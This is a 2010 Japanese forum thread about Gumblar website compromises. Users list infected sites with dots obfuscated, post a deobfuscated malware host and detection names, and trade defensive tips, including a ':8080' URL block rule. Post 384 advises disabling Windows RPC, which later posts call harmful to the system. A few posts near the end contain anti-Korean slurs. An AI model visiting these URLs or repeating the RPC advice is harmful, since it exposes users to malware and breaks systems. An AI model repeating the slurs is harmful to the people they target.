247 :名無しさん@お腹いっぱい。:2010/04/30(金) 14:32:02
visual-imp●net自体がやられてるっぽい
放置アフィサイトじゃないかなこれ

248 :名無しさん@お腹いっぱい。:2010/04/30(金) 14:44:22
>>247
放置されてるんだorz
だめもとでメル凸しときます

上のサイトにも全部送らないとねえ、見つけりゃ見つけたで大変だ…

249 :名無しさん@お腹いっぱい。:2010/04/30(金) 14:53:07
ガンブラーに感染しているサイトを閲覧をしてもノートンが反応をしないのだが・・

250 :名無しさん@お腹いっぱい。:2010/04/30(金) 14:53:49
>>249
そんなときもあるさ

251 :名無しさん@お腹いっぱい。:2010/04/30(金) 14:57:31
>>249
何の攻撃も受けてないから

252 :名無しさん@お腹いっぱい。:2010/04/30(金) 15:07:38
>>249
最悪ノートンスルーで感染してても、自覚があるなら調べればすぐわかるって

253 :名無しさん@お腹いっぱい。:2010/04/30(金) 17:13:46
http://biz-int.jp/
これの「企業情報」でAVGが反応するんだけど何?

254 :名無しさん@お腹いっぱい。:2010/04/30(金) 17:26:48
>>253
www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.mystic-rugby.com%2F
やられてるね

255 :名無しさん@お腹いっぱい。:2010/04/30(金) 17:58:57
>>254
そのサイトはマルチ商法の末期のもので、つい先日集団訴訟が始まったところです。
これは、サイト閉鎖の理由にするためにわざとしたのか、たまたま外部から攻撃されたのかとかわかる?

256 :名無しさん@お腹いっぱい。:2010/04/30(金) 18:29:41
ガンブラー攻撃に新手口、感染パソコンをDDoS攻撃の踏み台に
http://pc.nikkeibp.co.jp/article/news/20100428/1024614/
「.ru」ドメイン対策では防げない「Gumblar」攻撃 - マルウェア配布サイトに「.com」などが
http://www.security-next.com/012509.html



257 :名無しさん@お腹いっぱい。:2010/04/30(金) 19:01:06
>>254
なんで企業情報だけ別ドメインなんだろうね

>>255
わからんよ

ただjava1.jsというファイル名はいろいろ不安になる

258 :253:2010/04/30(金) 19:22:00
この会社を1年以上見てきたんだけど、以前のリンクはここだったはず。
http://www.mystic-rugby.com/info.html
あと、「採用情報」のところも反応するので、調べたら以前のリンクはここのよう。
http://www.micro-opt.com/baito.html

以前のリンクはどちらも感染してないのは、復旧を簡単にするためかな?

259 :名無しさん@お腹いっぱい。:2010/04/30(金) 19:43:20
>>258
そんなことはどうでもいいから>>1読めよ

260 :名無しさん@お腹いっぱい。:2010/04/30(金) 19:48:13
>>258
www●micro-opt●com トップがやられてる
全ページ改ざんされるわけじゃない
意図的だと思いたいなら勝手に思えばいいけど他人に迷惑かけないでくれ

261 :253:2010/04/30(金) 19:56:42
申し訳ありませんでした。

262 :名無しさん@お腹いっぱい。:2010/05/01(土) 04:50:25
「com:8080」あちこち探したけど見つからない…


【陥落サイトのURL悪用厳禁】
myako●net :再改竄ですかね、ここ
www●m-gcomm●jp :.jsに残ってたので再メル凸しときました
ivisit-corpは閉鎖した模様…再開するならちゃんと公表してほしい

そういえばkdashもpre21も全然公表してくれないなあ…
2chで晒されちゃったし、隠しても良い事ないと思うんだけど

263 :名無しさん@お腹いっぱい。:2010/05/01(土) 12:23:36
> myako●net
確認できないお

264 :名無しさん@お腹いっぱい。:2010/05/01(土) 12:51:50
/migilink2.js
ってのがやられてる
ほかにもあるかも

265 :名無しさん@お腹いっぱい。:2010/05/01(土) 12:53:50
ノートンはガンブラーに弱いのですね。

266 :名無しさん@お腹いっぱい。:2010/05/01(土) 13:00:59
最強だろ

267 :名無しさん@お腹いっぱい。:2010/05/01(土) 18:57:14
ttp://blog.f-secure.jp/archives/50396497.html

268 :名無しさん@お腹いっぱい。:2010/05/01(土) 19:35:44
そういえばAdobeとjavaって自動でアップデート出来なかったっけ?

269 :名無しさん@お腹いっぱい。:2010/05/01(土) 19:57:07
できる。
AdobeReaderのは最近追加&自分で設定する必要あり。

270 :名無しさん@お腹いっぱい。:2010/05/02(日) 00:04:12
Webシールド付いてるソフトがGumblar対策には有利?

271 :名無しさん@お腹いっぱい。:2010/05/02(日) 00:36:39
報告してくれる猛者の感染URLを確認しているが、何気にアクセスする可能性は皆無だな。

272 :名無しさん@お腹いっぱい。:2010/05/02(日) 01:30:16
>>270
あるに越したことはないが、どうせ>>2がきっちりできていれば攻撃は空振りになるので
有利なんて言えるほどの価値はない。

273 :名無しさん@お腹いっぱい。:2010/05/02(日) 02:08:56
近くにあるネカフェ探してて
ttp://www●freaks.ne●jp/honten/index●shtml
を見てたらEssentialsが反応してたんだけど
感染してる?

274 :名無しさん@お腹いっぱい。:2010/05/02(日) 02:17:57
js/jump●jsが引っかかった。

275 :名無しさん@お腹いっぱい。:2010/05/02(日) 02:18:13
>>273
gredによるとGumblar Generic (GJS055)
danさんとこで見たけどわからんかった

276 :名無しさん@お腹いっぱい。:2010/05/02(日) 02:20:07
>>274
なるほど。わかったthx
5行追加されててこれは相当やばいな
Last-Modified: Sat, 24 Oct 2009 02:01:08 GMT

277 :名無しさん@お腹いっぱい。:2010/05/02(日) 03:09:29
今更ですけど honten/js/index●js にも仕込まれてますね
無差別爆撃からjsファイル狙い撃ちに切り替えたのかな

278 :名無しさん@お腹いっぱい。:2010/05/02(日) 13:02:55
san●ron5●com/gbl/
ampmda●com
harappa-h●org/AtoZ

279 :名無しさん@お腹いっぱい。:2010/05/02(日) 13:10:28
www●komaike●com/drink/

280 :名無しさん@お腹いっぱい。:2010/05/02(日) 14:23:29
>>278279
これaguseで検出しないのにavastはガンブラー認定する
どっちが正しいのか

281 :名無しさん@お腹いっぱい。:2010/05/02(日) 14:39:05
>>280
そういうときは黒の結果を信用すべきでしょ
黒だと思ってりゃそれが間違っててもHP見れないだけだが
白だと思って実は黒でしたなんて事になったら目も当てられない

aguseはカスペだったと思うけどVTのカスペがバージョン古い事考えると
aguseも旧バージョンなんじゃね?と妄想

282 :名無しさん@お腹いっぱい。:2010/05/02(日) 14:47:14
>>280
全部黒だよ

283 :名無しさん@お腹いっぱい。:2010/05/02(日) 14:58:31
>>280
aguseはスルー多い
最近のはほとんどスルーされる

284 :名無しさん@お腹いっぱい。:2010/05/02(日) 14:58:46
よくわかんないけど、278と279、カスペ反応したよ。


285 :名無しさん@お腹いっぱい。:2010/05/02(日) 18:50:19
www●niaufuku●com/sense_up/

286 :名無しさん@お腹いっぱい。:2010/05/02(日) 19:08:34
www●kaizenya●net
ここも放置ですね


287 :名無しさん@お腹いっぱい。:2010/05/02(日) 20:22:50
www●sakiko●jp

288 :名無しさん@お腹いっぱい。:2010/05/03(月) 11:31:31
>>283
Gumblar/8080 Checker
ttp://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/
ここは最近のやつにも強いかな?

289 :名無しさん@お腹いっぱい。:2010/05/03(月) 12:18:58
>>288
ampmda●com
http://rd.or.tp//get.php?site=ampmda.com&act=view&ua-freetext=Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+6.1%3B+Trident%2F4.0%29&ua=none
http://www.virustotal.com/jp/analisis/8d93920eeef9346c87da08e7c555cb436b60f9b11b2c5610cf8007df14352996-1272856449
判断はお任せします

290 :名無しさん@お腹いっぱい。:2010/05/03(月) 12:25:46
ていうか色々試してみたらいいんじゃない?
検出できないやつを引っ張ってきただけで新型かどうか俺わかんないし
10社以上が検出してるやつでもそこでは引っかからないかもしんない

291 :名無しさん@お腹いっぱい。:2010/05/03(月) 12:31:42
YouTube - がんばらんば
http://www.youtube.com/watch?v=5JicOE2A5hg&fmt=34

292 :名無しさん@お腹いっぱい。:2010/05/03(月) 12:39:04
>>289
(”http5GIu”.substr(0,4)+”://w”+”ebguRx2”.substr(0,4)+”idet”+”v●in”+”fo:”))

-> http://webguidetv●info:

62●67●246●113

293 :名無しさん@お腹いっぱい。:2010/05/03(月) 16:07:32
>>288
どれも過信は禁物
一般ユーザーは>>2をやっとけばいい

294 :名無しさん@お腹いっぱい。:2010/05/03(月) 17:22:39
気になることがあるのですが
ググるだけで感染することはありえるのですか



295 :名無しさん@お腹いっぱい。:2010/05/03(月) 17:31:21
Googleが感染なんてことになればそうなるだろう

296 :名無しさん@お腹いっぱい。:2010/05/03(月) 17:41:12
avastが反応することはあるんじゃね?

297 :名無しさん@お腹いっぱい。:2010/05/03(月) 17:49:55
それはリンクの先読みしてるからだ

298 :名無しさん@お腹いっぱい。:2010/05/03(月) 17:50:05
リンク先読みな
あと右クリックしてリンクをブックマークとか名前を付けて保存とか間違って選択しただけでもヤバイ
履歴に残ってるから何らかのアクセスはしてる

299 :名無しさん@お腹いっぱい。:2010/05/03(月) 18:02:09
なぜここまで被害が広がったのか
なぜ未だに被害がおさまらないのか

300 :名無しさん@お腹いっぱい。:2010/05/03(月) 18:15:40
Gamblerが多いのさ

301 :名無しさん@お腹いっぱい。:2010/05/03(月) 19:52:39
サイト管理者はいつまで冷汗を流せばいいのやら

302 :名無しさん@お腹いっぱい。:2010/05/03(月) 20:02:42
ちゃんと対策してれば大丈夫なのに冷や汗も何もなくね

303 :名無しさん@お腹いっぱい。:2010/05/03(月) 20:09:58
>>2の対策はしたがIEとかウェブブラウザのJavaScriptも切っておいた方がいい?
YouTube等利用する時には面倒だけど

304 :名無しさん@お腹いっぱい。:2010/05/03(月) 20:25:55
動画を見る人が全てのサイトでオフにするのは現実的じゃないね
ドメインによって判断するタイプでも本人が判断できなければ意味がないしなあ

305 :名無しさん@お腹いっぱい。:2010/05/03(月) 20:28:20
オンで問題ないよ


306 :名無しさん@お腹いっぱい。:2010/05/03(月) 20:42:21
>>303
良いか悪いかで言えば「良い」ではある
利便性を断てば断つほど安全性が上がるのは間違いないし

307 :名無しさん@お腹いっぱい。:2010/05/03(月) 21:50:54
え。>>2の対策してたらJavaScript切らなくても良いの?
ダメなんかと思って、ようつべとか、わざわざその時だけオンにしてたのに

308 :名無しさん@お腹いっぱい。:2010/05/03(月) 22:08:10
切ってればいいじゃん
変に重いブログパーツとか広告とか読みこまなくても済むんだし

309 :名無しさん@お腹いっぱい。:2010/05/03(月) 22:12:05
FirefoxでNoscript入れて使えばいいじゃん

310 :名無しさん@お腹いっぱい。:2010/05/03(月) 22:12:48
昔は基本スクリプトOFFで必要なサイトだけONになるように登録しておくという使い方で
スクリプト必須なサイトなんか余り無かったから余裕だったんだけど
今はスクリプト一切使ってないサイトの方が少ないくらいだからな

311 :Undetect:2010/05/03(月) 23:10:44
スクリプト切ってても駄目なときは駄目なんだなこれが
そういう手立てを考えてきてるしね

312 :名無しさん@お腹いっぱい。:2010/05/03(月) 23:11:50
http://pachi-navi●biz/blog/


313 :名無しさん@お腹いっぱい。:2010/05/03(月) 23:15:29
スクリプトOFFでも感染するタイプのものもあるからね
スクリプト切るのは気休め程度にはなる

314 :名無しさん@お腹いっぱい。:2010/05/04(火) 00:27:03
>>312
found:Trojan-Downloader.JS.Pegel.e
try{window.onload=function()…

315 :名無しさん@お腹いっぱい。:2010/05/04(火) 02:12:34
>>2以上の対策は本当に自己満足や趣味の領域だからなあ。

316 :名無しさん@お腹いっぱい。:2010/05/04(火) 11:41:06
>>309
request policy


317 :名無しさん@お腹いっぱい。:2010/05/04(火) 11:53:40
今時ブラウザのJavaScriptをオフるなんてこといってる馬鹿がいるのはここか

318 :名無しさん@お腹いっぱい。:2010/05/04(火) 11:56:44
じゃあ>>4のテンプレはなんなんだ……

319 :名無しさん@お腹いっぱい。:2010/05/04(火) 12:02:44
対策してあればそんなことするのは不要って書いてあるじゃん

320 :名無しさん@お腹いっぱい。:2010/05/04(火) 12:11:01
荒れる元だから、テンプレからJavaScript関係は外すべきだという意見もあったんだけどな。
結局は当時スレ立てした奴がどうしても入れたがって今の形に落ち着いちゃった。

321 :名無しさん@お腹いっぱい。:2010/05/04(火) 13:00:50
>>319
不要なら>>4入れる必要すらないじゃん
まぁスレ建てた奴が必要だ必要だとゴネたんだろうか

322 :名無しさん@お腹いっぱい。:2010/05/04(火) 13:24:43
2の対策してなかったら、切った方が良い?

323 :名無しさん@お腹いっぱい。:2010/05/04(火) 13:31:41
対策しろよw

324 :名無しさん@お腹いっぱい。:2010/05/04(火) 13:31:46
どうにかして2の対策をしろ

325 :名無しさん@お腹いっぱい。:2010/05/04(火) 13:35:50
JAVAとJAVAスクリプトの違いがわかってない人もいるらしいからなあ

326 :名無しさん@お腹いっぱい。:2010/05/04(火) 13:51:18
JAVAと全部大文字で書く奴もいるしな

327 :名無しさん@お腹いっぱい。:2010/05/04(火) 13:59:11
Cokeと書いてコーラと読むしな

328 :名無しさん@お腹いっぱい。:2010/05/04(火) 14:10:32
>>321
ゴネたね。
放っとけばNoScriptみたいな特定拡張をテンプレに入れるのが確実なところを
他の奴が説得して、当たり障りのない>>4まで後退させた感じ。

329 :名無しさん@お腹いっぱい。:2010/05/04(火) 14:16:41
なぜかIEを執拗に推すやつがごねたんだよな

330 :名無しさん@お腹いっぱい。:2010/05/04(火) 14:28:24
というか、この現行スレを立てた奴も早漏だったんだよな。
前スレの残り50レスぐらいでテンプレの見直し案を話し合えばよかったのにさ。

331 :名無しさん@お腹いっぱい。:2010/05/04(火) 15:53:13
確か950どころか900を超えた瞬間に立ったんだよな

332 :名無しさん@お腹いっぱい。:2010/05/04(火) 16:08:34
そもそも>>2の対策してればガンブラーは無力とか言ってる奴は0dayという言葉を知っているのだろうか

333 :名無しさん@お腹いっぱい。:2010/05/04(火) 16:11:04
>>332
今のところ大丈夫ってだけで無力とはだれもいってないんじゃね

334 :名無しさん@お腹いっぱい。:2010/05/04(火) 16:27:29
得られる安心感よりも失う利便性の方が勝るような対策をテンプレで勧めるなってこと。
現状でのJavaScript切りは掛け捨てが確実な保険みたいな物なんだからさ。

335 :名無しさん@お腹いっぱい。:2010/05/04(火) 17:15:21
>>332
今出てるものに対して無力ならそれで十分だろ
これから出る亜種にも完璧です、が成立するんならgumblerに限らず
どのウイルスも感染する騒ぎになんてならないと思うんだが

336 :コテハン:2010/05/04(火) 18:40:41
久しぶりに掘ってみた
【陥落サイトのURL悪用厳禁】
www●seibidou●jp/ ←中途半端な修正
※products/information_sign/index●htmlとか
www●terralab●net/
bishoujyo●net/
rnacity●com/

■Gumblarっぽいの
www16●tok2●com/home/sawaiwan/part11/information4●html

337 :コテハン1:2010/05/04(火) 19:11:56
追加
www.hipparidako.net/index.html

338 :名無しさん@お腹いっぱい。:2010/05/04(火) 19:34:59
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***


339 :八頭 ◆YAGApwSaEw :2010/05/04(火) 19:53:29
いつも貰ってばかりでなんか悪いのでw

Google危険警告ページ
www●444wg●com/
wofxx●com/dnf/105.html
wofxx●com/dnf/106.html
www●dvdktv.com/list.asp?ProdId=0014

340 :名無しさん@お腹いっぱい。:2010/05/05(水) 01:50:23
毎日このスレ見てるがGENOを最後にユーザーが多いサイトは改ざんにあってないようだね
そもそもGENOも尼や楽天に比べればユーザー数は大した事ないだろうし
URL見てもどうでもいいような個人HPばっかのようだし

341 :名無しさん@お腹いっぱい。:2010/05/05(水) 02:08:17
> 毎日このスレ見てるがGENOを最後にユーザーが多いサイトは改ざんにあってないようだね
ニュースは見てないのか?

342 :名無しさん@お腹いっぱい。:2010/05/05(水) 02:08:44
水掛け論になってないか?
目指せ「サルでも判るガンブラー対策」…今更すぎるorz

>>336
www16●tok2●com/home/sawaiwan/part11/information4●html :Gumblar Generic (GJS005)

ここもですね
www●mayabeya●com/mm/mail_magazine●html :Gumblar Generic (GJS003)

>>337
www●hipparidako●net/index●html :8080 Injection (GJS092)

>>339
この類のサイトは放置でも構わない気がしないでもないw

343 :名無しさん@お腹いっぱい。:2010/05/05(水) 02:11:10
>>340
おまえはなにをいってるんだ

344 :名無しさん@お腹いっぱい。:2010/05/05(水) 05:13:47
>>341>>343
なんかGENO以外に大事件あったっけ
あーJR束は改ざんされたか

345 :名無しさん@お腹いっぱい。:2010/05/05(水) 06:13:22
http://www.so-net.ne.jp/security/index.html
セキュリティ関連ニュースを過去ログ含めて読んでみるといい

346 :名無しさん@お腹いっぱい。:2010/05/05(水) 12:29:57
nameps●net/4/2

347 :名無しさん@お腹いっぱい。:2010/05/05(水) 13:21:59
Gumblarって感染の話ばかりで、どんな発症・被害を与えるのかその中身の話はされないな

348 :名無しさん@お腹いっぱい。:2010/05/05(水) 13:40:01
それはひょっとしてギャグで言っているのか?

349 :名無しさん@お腹いっぱい。:2010/05/05(水) 13:45:20
君こそギャグで言ってるのか?

350 :名無しさん@お腹いっぱい。:2010/05/05(水) 13:51:01
俺がギャグだ

351 :名無しさん@お腹いっぱい。:2010/05/05(水) 14:33:26
ttp://ampmda●com/?up/download/file/1953752846●zip●html

踏んじまったけどavast反応しねー

352 :名無しさん@お腹いっぱい。:2010/05/05(水) 14:41:31
>>344
三井住友VISAも改ざんされなかったっけ?
一応プレスリリースで報告出したけど、対応が最低だった

353 :名無しさん@お腹いっぱい。:2010/05/05(水) 15:14:13
>>352
見てみたけど確かに最低だな
委託会社の責任とはいえ個人情報やクレカ番号流出させといて
保証のほの字も書いてないんじゃなあ…

354 :名無しさん@お腹いっぱい。:2010/05/05(水) 15:54:22
TOPページの情報からはさっさと消してるしな>三井住友VISA

355 :名無しさん@お腹いっぱい。:2010/05/05(水) 16:00:13
>>351
>>278だな
gredスルー
aguseスルーだが8080を拾って赤文字表示

そのドメインでぐぐったら必死チェッカーがひっかかった
同一人物が連日貼っているようだね
hissi.org/read.php/news/20100504/SjJBaCtkNVc.html
hissi.org/read.php/news/20100503/RVVtUUl6SWM.html

356 :名無しさん@お腹いっぱい。:2010/05/05(水) 17:00:16
この問題って
何でTVや新聞で大きく取り上げられないの?

357 :名無しさん@お腹いっぱい。:2010/05/05(水) 17:09:49
新聞、TVが取り上げてもメリットがないから
三井住友だと自分に出資してるところだったりして
自分の首を絞めることになるから

358 :名無しさん@お腹いっぱい。:2010/05/05(水) 17:13:01
>>357
サンクス

359 :名無しさん@お腹いっぱい。:2010/05/05(水) 17:13:37
それなら、GENO以下じゃなかいか

360 :名無しさん@お腹いっぱい。:2010/05/05(水) 18:48:20
>>356
多少ニュースにはなったけど説明めんどくさくて省略されがち
NHKニュースでわりとまともに扱ってくれたことはあったけど視聴者は思考停止が大半だろうな

361 :名無しさん@お腹いっぱい。:2010/05/05(水) 18:49:58
Gumblarに感染そして発症→
→サイト管理のIDとPasswordを盗まれる→
→それを使用されサーバ自体から情報が盗まれる、ついでにサイト改竄(ウイルスを仕込む)→
→そのサイトの訪問者にGumblar感染、感染先でまたIDとPasswordが盗まれる→あとは繰り返し

でも不思議なのはサービス提供する企業とかのサーバなのに、なんでそれ使ってネットサーフィンなんかやってんの?
それともアクセスされるだけで感染するわけか
それとゼロデイ攻撃の段階では仕方ないとしても、それ以降はアプデしておくだけで防げたんでそ
なんで企業レベル行政レベルがこんなものに感染し続けたのか

362 :名無しさん@お腹いっぱい。:2010/05/05(水) 19:17:05
>>361
企業はパッチの安全性や安定性が確認されるまでパッチを導入しないことがほとんど
理由はパッチの適用でシステムが不安定になる可能性がゼロじゃないから

ゼロデイ修正パッチとかは配布元的には配布と同時に適用してもらいたいはずだが
確認が終わるまで導入が見送られるため攻撃に晒されてしまうことがある

363 :名無しさん@お腹いっぱい。:2010/05/05(水) 19:34:45
>>361
いろいろ勘違いしてるようだけど
サーバ自身でネットサーフィンとかしてるわけじゃないし
感染してるのはサイト管理PCであってサーバじゃない
おそらく話の半分くらいしか理解できてないよね

> それともアクセスされるだけで感染するわけか
アクセスされるだけで感染するのはそのサイトを閲覧したPCであってサーバーじゃない

感染し続けてる理由はサイト管理者のセキュリティ意識が低いからってだけだよ
閲覧してるPCが感染し続けるのは>>362もあるけど
それは企業のサイト改ざんにはあまり結びつかない

364 :名無しさん@お腹いっぱい。:2010/05/05(水) 19:35:27
>>363補足
サイト管理PCもしくはサイト管理PCと同じネットワーク内にあるPCだ

365 :名無しさん@お腹いっぱい。:2010/05/05(水) 20:27:34
>>362
聞き覚えある、そういう要素あったね

>>363
なるほどそっかー
サーバでネットサーフィンとか、言われると自分で読んでても確かに痛い誤解
>閲覧してるPCが感染し続けるのは>>362もあるけど
>それは企業のサイト改ざんにはあまり結びつかない
これは>>362は組織・団体レベルのサイト管理者はこれが言い訳にはならないってこと?

ここも合わせて読んで9割は理解できたと思う
http://www.atmarkit.co.jp/fsecurity/column/kawaguchi/022.html


でもFTPのIDとPasswordを盗られる以外の被害ってあんま語られないね
そのうち暴露系と組み合わさったものが出てくるのかもしれんね
またとんちんかんだったらゴメン笑


366 :名無しさん@お腹いっぱい。:2010/05/05(水) 20:48:18
>>365
一般ユーザーが多い企業、部署や実際に運用してる基幹系サーバーじゃパッチあてに
慎重なとこもあるけどサイト管理してるとこでそれはありえないでしょ
単に意識が希薄だったとしかいえない
しかも大きめの企業サイトなら管理してるのはシロウトじゃなくプロ
「同一ネットワーク内」の感染があるとしてもプロがやるミスとしてはありえないレベル

> でもFTPのIDとPasswordを盗られる以外の被害ってあんま語られないね
これはいろいろ出てるんだけど適当にまとまったソースはないかもしれない
so-netのセキュリティ通信とかLACあたりにあったかなー
ユーザーにも見える範囲だと偽セキュリティソフトのインストール、
見えないとこだとどっかのサイト攻撃とか

偽セキュリティソフトのインストールはケイダッシュが感染したときの被害者報告でも確認できた

暴露系はP2Pで目的が違うから別です

367 :名無しさん@お腹いっぱい。:2010/05/05(水) 21:08:21
>>366
暴露系ってP2Pを超えて被害を出したんじゃなかったっけ、山田オルタナティブ、Kenzeroとか
まあスクショ取ってバラ撒くくらいのものがGunblarでもありうるかと思った
いろいろ勉強してくる、ありがとう!

368 :名無しさん@お腹いっぱい。:2010/05/05(水) 21:16:13
>>366補足
肝心なこと忘れてた
そもそもまともなサイト管理会社ならFTPなんか使わない

>>367
日本のウイルスはイタズラ目的
こういうのはビジネス目的だから違うんだよ

369 :名無しさん@お腹いっぱい。:2010/05/05(水) 22:35:53
これって感染すると自分のブログも改竄されちゃうの?
元々非公開設定だから改竄されても他人には迷惑かけないとは思うんだけど……

370 :名無しさん@お腹いっぱい。:2010/05/05(水) 22:46:44
>>355
VIPとかの画像スレとかで見たなそれ
レスに対して不自然な単発レスとか付いてたし
「面白いなこのサイト」とかあったから自演を駆使して踏ませようと必死になってるっぽいw

371 :名無しさん@お腹いっぱい。:2010/05/05(水) 23:14:15
>>369
FTPサーバ上で提供されるサイトやブログがGumblarに感染して、そうして管理IDとPassを盗られて、それを使って改竄をするんじゃない
だからそのブログを改竄しようと思えばやれるんだけど、そのブログにそんなことする価値があるのかで変わってくるんじゃないのかね


372 :名無しさん@お腹いっぱい。:2010/05/05(水) 23:27:38
>>371
改竄する価値は無いと思うw
自分のPCが感染してたら
クリーンインストールしてブログのパスワードも変えなきゃいけないのかあと思って

373 :名無しさん@お腹いっぱい。:2010/05/05(水) 23:36:37
ampmda.comって奴は8080系だからリモートポート8080番塞いでれば無効化できるって認識でいいの?

374 :名無しさん@お腹いっぱい。:2010/05/05(水) 23:37:40
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***

375 :名無しさん@お腹いっぱい。:2010/05/05(水) 23:40:15
ブログやSNS、HPもやってない俺は>>2以外に何をすればいいのだろう

376 :371:2010/05/05(水) 23:48:12
>FTPサーバ上で提供されるサイトやブログがGumblarに感染して、

これ違ったか、個々のクライアントPCが感染するんだ、そしてFTPサーバ上で提供されるサイト開設やブログ開設サービスを使ってる場合にその管理者IDとPassを盗られる
だから、公開してないんだから大丈夫だと思ったけど上記の理由で大丈夫じゃない
それに管理者IDとPass盗られて改竄できるってことは、ただ閲覧されたりもするってことで
犯人たちの目的と興味次第ってことだと


377 :名無しさん@お腹いっぱい。:2010/05/05(水) 23:52:10
>>372
日本語わからんからそういうの関係ないよ
軒並み改ざんされるだけ
ブログの場合はFTPじゃないとおもうんでまた別だろうけど
感染していた場合はそのPCで犯罪行為の手伝いをさせられるんでクリーンインストール推奨です

378 :名無しさん@お腹いっぱい。:2010/05/05(水) 23:55:15
botnetwork使ってFTPにアップロード命令させてるんなら
blogまではいちいち改ざんしないとは思うけど
まぁ、過信は禁物だね

379 :369:2010/05/06(木) 00:03:12
クリーンインストールやって、>>2をしっかりやったあとで、ブログのパスワードも変える
これが一番確かなんですよね
アドバイスくれた方々どうもです

>>2は以前からやってたけど
そもそも自分のブログは改竄される可能性があるのかどうかが気になって
ちょっと気持ち悪かったので質問させてもらいました

380 :名無しさん@お腹いっぱい。:2010/05/06(木) 00:13:49
つーか被害の広がり方を見ると
意識の低さが浮き彫りになってるな

381 :名無しさん@お腹いっぱい。:2010/05/06(木) 00:19:09
>>2には「使わないならインストールするな」と書き加えるべきだな

382 :名無しさん@お腹いっぱい。:2010/05/06(木) 01:06:16
ブログは、直接htmlファイルをいじる訳じゃないし
タグを記述する場合もテキストボックス上で行うから
PCが感染してても問題ないように思うけど

383 :名無しさん@お腹いっぱい。:2010/05/06(木) 01:27:55
■8080系の対策について
>>2をやっておけば「現時点では」感染しない。
※Adobe ReaderやJavaは必要無いならアンインストールを推奨
【参照】
サイト改ざん猛威:ウイルス感染を100%防げる「ソフトウェアの更新」を
ttp://www.so-net.ne.jp/security/news/library/2165.html
オラクル、JREの最新版「6 Update 20」公開〜早急に更新しないと危険
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=2215

■以下は「自己満足」の世界(過剰防衛が好きな人向け)
・ブラウザのJavaScriptを切る(JavaScriptベースのDbd全般に有効)
・*:8080/*を含むURLをブロック(対8080系限定)
・8080番ポートを閉じる(対8080系限定/但し非推奨)


384 :名無しさん@お腹いっぱい。:2010/05/06(木) 01:40:05
危険ポートを閉じることでセキュリティを強化する。

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja

385 :名無しさん@お腹いっぱい。:2010/05/06(木) 02:51:57
>>384
ポート135を閉じる(RPC停止する)と問題発生することが多いと書いてあったが

>そこで,Windows XPが備えているパーソナル・ファイアウォールやセキュリティ対策ソフトに付いているクライアントPC用のファイアウォール機能で
>危険なポートを閉じれば,感染予防としてはさらに効果があります。しかし,既存システムへ与える影響は大きくなります。
>例えば,各PCでTCP/UDP135番を閉じてしまうと,RPCを用いたシステムやActive Directoryが拠点内でも利用できなくなります。
>また,TCP/UDP139番や445番を閉じると,ファイルやプリンタの共有さえできなくなります。

まあ、やるなら自己責任でってことで

386 :385:2010/05/06(木) 02:53:33
ごめん、sageるの忘れてた

387 :名無しさん@お腹いっぱい。:2010/05/06(木) 02:59:50
135はファイアウォールで閉じるのが常識だな
139や445はLANを組んでなかったら閉じても問題ない

388 :名無しさん@お腹いっぱい。:2010/05/06(木) 03:04:41
ルータのファイアウォールの初期設定は0〜1023のポートは閉じてるのが多いんじゃなかったっけ
外部からのアクセスのみだけど

389 :名無しさん@お腹いっぱい。:2010/05/06(木) 03:08:04
ステートフルインスペクションだね

390 :名無しさん@お腹いっぱい。:2010/05/06(木) 03:10:32
ステートフルインスペクション はガンブラーには無力だし

391 :名無しさん@お腹いっぱい。:2010/05/06(木) 03:19:34
>>384にて135ポートを閉じると
OSの再インストールをするはめになる

回避策はあるがド素人はやめとけ

392 :名無しさん@お腹いっぱい。:2010/05/06(木) 09:18:51
135、445、8080はsymantecのポートスキャンで「ステルス」になっていればいいんじゃないか?

393 :名無しさん@お腹いっぱい。:2010/05/06(木) 10:13:00
ステルスってポートスキャンに対して反応返さない=空いてるかどうかわからないってだけで閉じてるわけじゃないのでは
シマンテックのスキャン使ったことないからわからないけど

今確認したら俺はポート135,445は受信ストリームはTCP/UDPとも俺は手持ちのカスペがデフォで閉じていた
8080は一応自分でTCP/UDPともリモートポートは閉じてみた

394 :名無しさん@お腹いっぱい。:2010/05/06(木) 12:47:46
福本先生確認

395 :394:2010/05/06(木) 12:48:36
誤爆しますた(´・ω・`)

396 :名無しさん@お腹いっぱい。:2010/05/06(木) 12:54:03
絶対に許さない

397 :名無しさん@お腹いっぱい。:2010/05/06(木) 13:07:56
絶対にだ

398 :名無しさん@お腹いっぱい。:2010/05/06(木) 13:13:35
絶対ニダ

399 :名無しさん@お腹いっぱい。:2010/05/06(木) 13:16:33
謝罪と賠償を求めるニダ

400 :名無しさん@お腹いっぱい。:2010/05/06(木) 13:34:50
レイシストうざ

401 :名無しさん@お腹いっぱい。:2010/05/06(木) 13:39:47
半島へ返れ

402 :名無しさん@お腹いっぱい。:2010/05/06(木) 13:44:37
何言ってんだこのバカ

403 :名無しさん@お腹いっぱい。:2010/05/06(木) 13:59:12
>>384
サービスを止めるのと、ポートを閉じるのは違うぞ。
